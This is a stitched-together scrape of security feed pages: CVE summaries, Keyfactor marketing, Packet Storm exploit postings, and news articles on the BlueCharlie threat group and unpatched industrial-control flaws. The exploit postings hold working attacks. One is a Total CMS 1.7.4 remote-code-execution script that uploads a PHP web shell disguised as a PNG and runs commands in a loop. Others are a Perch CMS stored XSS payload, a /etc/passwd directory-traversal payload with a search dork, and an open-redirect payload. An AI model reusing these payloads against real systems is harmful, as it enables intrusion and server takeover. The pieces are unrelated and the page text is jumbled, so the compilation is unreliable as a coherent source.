In the Keyfactor EJBCA before 8.0.0, the RA web certificate distribution servlet /ejbca/ra/cert allows partial denial of service due to an authentication issue. In configurations using OAuth, disclosure of CA certificates (attributes and public keys) to unauthenticated or less privileged users may occur.

 

**Unlock trust.  
Unlock everything.**

Keyfactor delivers identity-first security for every device, workload, and thing. Because when you establish digital trust, great things happen.

Great companies trust Keyfactor.

**When everything is connected,  
everything has to be trusted.**

More devices. More workloads. More transactions. Digital trust has never  
been so vital—or so complex. But do it right, and you won’t just boost security;  
you’ll get unmatched agility, control, and scalability. That’s where we come in.

IDENTIFY

**Powerful, highly scalable  
PKI for enterprise or IoT.**

Seamlessly issue and manage trusted  
identities—for every machine and person.

The easily scalable, open-source version  
of Keyfactor’s PKI platform.

MANAGE

**Visibility, control, and  
automation for IoT and  
machine IDs.**

Discover and automate your PKI and  
digital certificates from one platform.

Manage all of your IoT device identities—  
at scale—from a single place.

SIGN

**Fast, secure, and flexible  
signing solutions.**

Easily protect keys and sign code with  
native tools.

Automatically sign code and documents  
fast with APIs.

**Find Your Digital Trust**

**loT**

Embed each device with a trusted and unique identity at design, then keep it secure throughout the product lifecycle.

**Enterprise IT**

Establish digital trust across enterprise and multi-cloud environments with trusted PKI and machine identity automation.

**Webinar****Integrating Secure Code Signing in the CI/CD Pipeline**

Watch

**Whitepaper****Five Guiding Tenets for IoT Security**

Read More

**Report****Emerging Trends in Cryptography for 2022**

Read More

**“PKI is an absolute foundational piece to what we’re building. Without EJBCA, we couldn’t have what we have. It is a key pillar to the future of our products.”****Jason Slack****Director of Engineering**

Read Case Study

**“We went from 2,000 certificates to more than 350,000 certificates. That’s a lot to keep track of, but Keyfactor helps us keep everything in view and it’s allowed us to scale massively.”****Joshua Nash****Technology Manager and SVP for Security Engineering**

Read Case Study

**“Sometimes it was difficult to get things working right away or to deploy it on EJBCA. But every time we had an issue, Keyfactor and Red Hat helped us to solve it. It was a very productive relationship.”****Rufus Buschart****Head of PKI at Siemens**

Read Case Study

**“Certificates would expire, but we wouldn’t know until systems went down. Since deploying Keyfactor, we’ve eliminated these incidents entirely.”****David Yu****VP of Security Architecture**

Read Case Study

**“PKI is an absolute foundational piece to what we’re building. Without EJBCA, we couldn’t have what we have. It is a key pillar to the future of our products.”****Jason Slack****Director of Engineering**

Read Case Study

**“We went from 2,000 certificates to more than 350,000 certificates. That’s a lot to keep track of, but Keyfactor helps us keep everything in view and it’s allowed us to scale massively.”****Joshua Nash****Technology Manager and SVP for Security Engineering**

Read Case Study

**“Sometimes it was difficult to get things working right away or to deploy it on EJBCA. But every time we had an issue, Keyfactor and Red Hat helped us to solve it. It was a very productive relationship.”****Rufus Buschart****Head of PKI at Siemens**

Read Case Study

**“Certificates would expire, but we wouldn’t know until systems went down. Since deploying Keyfactor, we’ve eliminated these incidents entirely.”****David Yu****VP of Security Architecture**

Read Case Study

**Keyfactor by the Numbers**

**90 %**

Support Satisfaction

**4.6 **

G2 Reviews

**Ready to try  
Keyfactor?**

CVE-2023-34196: Home

File Upload vulnerability in Total CMS v.1.7.4 allows a remote attacker to execute arbitrary code via a crafted PHP file to the edit page function.

    # Exploit Title: Total CMS 1.7.4 - Remote Code Execution (RCE) on File Upload (Authenticated) # Date: 03/06/2023# Exploit Author: tmrswrr# Version: 1.7.4# Vendor home page : https://www.totalcms.co/# Tested Url : https://www.totalcms.co/demo/soccer/#PLatform : MACOSX1) Go to this page and click edit page buttonhttps://localhost/demo/soccer/2)After go down and will you see downloads area 3)Add in this area shell.php file?PNG...<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>"  ?>IEND4) After open this file and write commandshttps://localhosts/cms-data/depot/cmssoccerdepot/shell.php?cmd=idResult :?PNG ...uid=996(caddy) gid=998(caddy) groups=998(caddy),33(www-data)IEND Exploit: import requestsurl = input("Enter the URL: ")urll = url + "/rw_common/plugins/stacks/total-cms/totalapi.php"headers = {    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',    'Accept': 'application/json',    'Accept-Language': 'en-US,en;q=0.5',    'Accept-Encoding': 'gzip, deflate',    'Cache-Control': 'no-cache',    'X-Requested-With': 'XMLHttpRequest',    'Total-Key': '3c79a3226d86c825bc0c4cb0cca05b17',    'Content-Type': 'multipart/form-data; boundary=---------------------------17104855723143716151436432930',    'Origin': urll,    'Dnt': '1',    'Referer': f'{urll}/demo/soccer/admin/',    'Sec-Fetch-Dest': 'empty',    'Sec-Fetch-Mode': 'cors',    'Sec-Fetch-Site': 'same-origin',    'Te': 'trailers',    'Connection': 'close'}data = '''\-----------------------------17104855723143716151436432930\r\nContent-Disposition: form-data; name="slug"\r\n\r\ncmssoccerdepot\r\n-----------------------------17104855723143716151436432930\r\nContent-Disposition: form-data; name="type"\r\n\r\ndepot\r\n-----------------------------17104855723143716151436432930\r\nContent-Disposition: form-data; name="file"; filename="hey.php"\r\nContent-Type: application/x-php\r\n\r\n?PNG...<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>"  ?>IEND\r\n\r\n-----------------------------17104855723143716151436432930--'''while True:    command = input("WRITE YOUR COMMAND ('exit' to quit): ")    if command.lower() == "exit":        break    response = requests.post(url, headers=headers, data=data)    if response.status_code == 200:        shell_path = f'/cms-data/depot/cmssoccerdepot/hey.php?cmd={command}'        shell_url = url + shell_path        print(shell_url)        shell_response = requests.get(shell_url)        print(shell_response.text)    else:        print('Failed to execute the request.')

CVE-2023-36212: Total CMS 1.7.4 Shell Upload ≈ Packet Storm


An insufficient verification of data vulnerability exists in BIG-IP Edge Client for Windows and macOS that may allow an attacker to modify its configured server list.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

Loading

×Sorry to interrupt

CSS Error

Refresh

CVE-2023-36858: myF5


The BIG-IP Edge Client Installer on macOS does not follow best practices for elevating privileges during the installation process.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

CVE-2023-38418: myF5

Perch CMS version 3.2 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title:# Date: 07/2023# Exploit Author: Andrey Stoykov# Version: 3.2# Tested on: Windows Server 2022# Blog: http://msecureltd.blogspot.comXSS #1:File: roles.edit.post.phpLine #57:[...]<div class="field-wrap <?php echo $Form->error('roleTitle', false);?>">        <?php echo $Form->label('roleTitle', 'Title'); ?>        <div class="form-entry">            <?php echo $Form->text('roleTitle', $Form->get($details,'roleTitle')); ?>        </div>    </div>[...]Steps to Reproduce:1. Login to application2. Go to Roles3. Select Title4. Enter payload TEST"><img src=x onerror=alert(1)>// HTTP POST requestPOST /perch/perch/core/users/roles/edit/?id=1 HTTP/1.1Host: 192.168.1.11User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/114.0[...]roleTitle=TEST%22%3e%3cimg+src%3dx+onerror%3dalert%281%29%3e&privs-perch%5b%5d=1&btnsubmit=Save+changes&formaction=core&token=0389a6698f1911a162fdb71328dd2af0// HTTP responseHTTP/1.1 200 OKServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4[...][...]<a href="/perch/perch/core/users/roles/edit/?id=1">TEST"><img src=xonerror=alert(1)></a>[...]

Perch CMS 3.2 Cross Site Scripting

CRM Education Akademik version 9.0 suffers from a directory traversal vulnerability.

**CRM Education Akademik 9.0 Directory Traversal**

Posted Aug 2, 2023

Authored by indoushka

CRM Education Akademik version 9.0 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 6e95307be12bd51e46394f0bd73e05351ba0fd3add7a2dec472d479731567109

Download | Favorite | View

**CRM Education Akademik 9.0 Directory Traversal**

    ====================================================================================================================================| # Title     : CRM Education Akademik v9.0 Directory Traversal Vulnerability                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://p30vel.ir/                                                                                                  |  | # Dork      : "media.php?module=home"                                                                                            |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : downlot.php?file=\../../../../../../../../../../etc/passwd[+]  http://127.0.0.1/akademik.stikes-aisyiyahbandungacid/downlot.php?file=\../../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,846)
*   Arbitrary (16,175)
*   BBS (2,859)
*   Bypass (1,739)
*   CGI (1,026)
*   Code Execution (7,264)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,339)
*   DoS (23,391)
*   Encryption (2,369)
*   Exploit (51,737)
*   File Inclusion (4,220)
*   File Upload (970)
*   Firewall (821)
*   Info Disclosure (2,759)
*   Intrusion Detection (892)
*   Java (3,038)
*   JavaScript (856)
*   Kernel (6,661)
*   Local (14,445)
*   Magazine (586)
*   Overflow (12,668)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,599)
*   Python (1,532)
*   Remote (30,716)
*   Root (3,578)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,882)
*   Shell (3,178)
*   Shellcode (1,213)
*   Sniffer (894)
*   Spoof (2,197)
*   SQL Injection (16,341)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,732)
*   Web (9,638)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,897)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,800)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,340)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,657)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,788)
*   UNIX (9,284)
*   UnixWare (186)
*   Windows (6,566)
*   Other

CRM Education Akademik 9.0 Directory Traversal

Coupons CMS version 4.00 suffers from an open redirection vulnerability.

**Coupons CMS 4.00 Open Redirection**

Posted Aug 2, 2023

Authored by indoushka

Coupons CMS version 4.00 suffers from an open redirection vulnerability.

tags | exploit

SHA-256 | 89eec3911e92a444e6c66b2518084ebd6482c026ff7e22103198824accfac76e

Download | Favorite | View

**Coupons CMS 4.00 Open Redirection**

    ====================================================================================================================================| # Title     : Coupons CMS v4.00 URL redirection Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/coupons-cms-500/11686064?ref=shadyro                                                   |  | # Dork      : Powered by CouponsCMS.com                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+]  use payload : /plugin/click.html?backTo=https://packetstormsecurity.com&coupon=2&reveal_code=1[+]  http://127.0.0.1/couponscms.com/demo/plugin/click.html?backTo=https://packetstormsecurity.com&coupon=2&reveal_code=1Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,846)
*   Arbitrary (16,175)
*   BBS (2,859)
*   Bypass (1,739)
*   CGI (1,026)
*   Code Execution (7,264)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,339)
*   DoS (23,391)
*   Encryption (2,369)
*   Exploit (51,737)
*   File Inclusion (4,220)
*   File Upload (970)
*   Firewall (821)
*   Info Disclosure (2,759)
*   Intrusion Detection (892)
*   Java (3,038)
*   JavaScript (856)
*   Kernel (6,661)
*   Local (14,445)
*   Magazine (586)
*   Overflow (12,668)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,599)
*   Python (1,532)
*   Remote (30,716)
*   Root (3,578)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,882)
*   Shell (3,178)
*   Shellcode (1,213)
*   Sniffer (894)
*   Spoof (2,197)
*   SQL Injection (16,341)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,732)
*   Web (9,638)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,897)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,800)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,340)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,657)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,788)
*   UNIX (9,284)
*   UnixWare (186)
*   Windows (6,566)
*   Other

Coupons CMS 4.00 Open Redirection

A Russa-nexus adversary has been linked to 94 new domains, suggesting that the group is actively modifying its infrastructure in response to public disclosures about its activities.
Cybersecurity firm Recorded Future linked the new infrastructure to a threat actor it tracks under the name BlueCharlie, a hacking crew that's broadly known by the names Blue Callisto, Callisto (or Calisto),

A Russa-nexus adversary has been linked to 94 new domains, suggesting that the group is actively modifying its infrastructure in response to public disclosures about its activities.

Cybersecurity firm Recorded Future linked the new infrastructure to a threat actor it tracks under the name **BlueCharlie**, a hacking crew that's broadly known by the names Blue Callisto, Callisto (or Calisto), COLDRIVER, Star Blizzard (formerly SEABORGIUM), and TA446. BlueCharlie was previously given the temporary designation Threat Activity Group 53 (TAG-53).

"These shifts demonstrate that these threat actors are aware of industry reporting and show a certain level of sophistication in their efforts to obfuscate or modify their activity, aiming to stymie security researchers," the company said in a new technical report shared with The Hacker News.

BlueCharlie is assessed to be affiliated with Russia's Federal Security Service (FSB), with the threat actor linked to phishing campaigns aimed at credential theft by making use of domains that masquerade as the login pages of private sector companies, nuclear research labs, and NGOs involved in Ukraine crisis relief. It's said to be active since at least 2017.

"Calisto collection activities probably contribute to Russian efforts to disrupt Kiev supply-chain for military reinforcements," Sekoia noted earlier this year. "Moreover, Russian intelligence collection about identiﬁed war crime-related evidence is likely conducted to anticipate and build counter narrative on future accusations."

Another report published by NISOS in January 2023 identified potential connections between the group's attack infrastructure to a Russian company that contracts with governmental entities in the country.

"BlueCharlie has carried out persistent phishing and credential theft campaigns that further enable intrusions and data theft," Recorded Future said, adding the actor conducts extensive reconnaissance to increase the likelihood of success of its attacks.

The latest findings reveal that BlueCharlie has moved to a new naming pattern for its domains featuring keywords related to information technology and cryptocurrency, such as cloudrootstorage\[.\]com, directexpressgateway\[.\]com, storagecryptogate\[.\]com, and pdfsecxcloudroute\[.\]com.

Seventy-eight of the 94 new domains are said to have been registered using NameCheap. Some of the other domain registrars used include Porkbun and Regway.

To mitigate threats posed by state-sponsored advanced persistent threat (APT) groups, it's recommended that organizations implement phishing-resistant multi-factor authentication (MFA), disable macros by default in Microsoft Office, and enforce a frequent password reset policy.

"While the group uses relatively common techniques to conduct attacks (such as the use of phishing and a historical reliance on open-source offensive security tools), its likely continued use of these methods, determined posture, and progressive evolution of tactics suggests the group remains formidable and capable," the company said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Russian Cyber Adversary BlueCharlie Alters Infrastructure in Response to Disclosures

About 34% of security vulnerabilities impacting industrial control systems (ICSs) that were reported in the first half of 2023 have no patch or remediation, registering a significant increase from 13% the previous year.
According to data compiled by SynSaber, a total of 670 ICS product flaws were reported via the U.S. Cybersecurity and Infrastructure Security Agency (CISA) in the first half of

About 34% of security vulnerabilities impacting industrial control systems (ICSs) that were reported in the first half of 2023 have no patch or remediation, registering a significant increase from 13% the previous year.

According to data compiled by SynSaber, a total of 670 ICS product flaws were reported via the U.S. Cybersecurity and Infrastructure Security Agency (CISA) in the first half of 2023, down from 681 reported during the first half of 2022.

Of the 670 CVEs, 88 are rated Critical, 349 are rated High, 215 are rated Medium, and 18 are rated Low in Severity. 227 of the flaws have no fixes in comparison to 88 in H1 2022.

"Critical manufacturing (37.3% of total reported CVEs) and Energy (24.3% of the total reported) sectors are the most likely to be affected," the OT cybersecurity and asset monitoring company said in a report shared with The Hacker News.

Other prominent industry verticals include water and wastewater systems, commercial facilities, communications, transportation, chemical, healthcare, food and agriculture, and government facilities.

Some of the other notable findings are as follows -

*   Mitsubishi Electric (20.5%), Siemens (18.2%), and Rockwell Automation (15.9%) were the most impacted vendors in the critical manufacturing sector
*   Hitachi Energy (39.5%), Advantech (10.5%), Delta Electronics, and Rockwell Automation (both 7.9%) were the most impacted vendors in the energy sector
*   Siemens emerged as the leading entity producing the most CVEs through the first half of 2023, accounting for 41 ICS advisories
*   Use after free, out-of-bounds read, improper input validation, out-of-bounds write, and race condition were the top five software weaknesses

What's more, a majority of CVE reports (84.6%) originated from original equipment manufacturers (OEMs) and security vendors in the United States, followed by China, Israel, and Japan. Independent and academic research accounted for 9.4% and 3.9%, respectively.

"Forever-Day vulnerabilities remain an issue – six CISA Advisories identified for ICS vendor products that reached end of life with 'Critical' severity vulnerabilities have no update, patch, hardware/ software/ firmware updates, or known workarounds," the company pointed out.

SynSaber, however, noted that relying on CISA ICS advisories alone may not be sufficient, and that organizations need to monitor multiple sources of information to get a better idea of the flaws that may be relevant to their environments.

"Care should be taken to understand vulnerabilities in the context of the environments in which they appear," it said. "Since every OT environment is unique and purpose-built, the likelihood of exploitation and impact that it may have will vary greatly for each organization."

The findings come as Nozomi Networks revealed a "high volume of network scanning indications in water treatment facilities, cleartext password alerts across the building materials industry, program transfer activity in industrial machinery, \[and\] OT protocol packet injection attempts in oil and gas networks."

The IoT cybersecurity company said it detected an average of 813 unique attacks daily against its honeypots, with top attacker IP addresses emanating from China, the U.S., South Korea, Taiwan, and India.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Industrial Control Systems Vulnerabilities Soar: Over One-Third Unpatched in 2023

Given the privileged position these devices occupy on the networks they serve, they are prime targets for attackers, so their security posture is of paramount importance.

Tag

#mac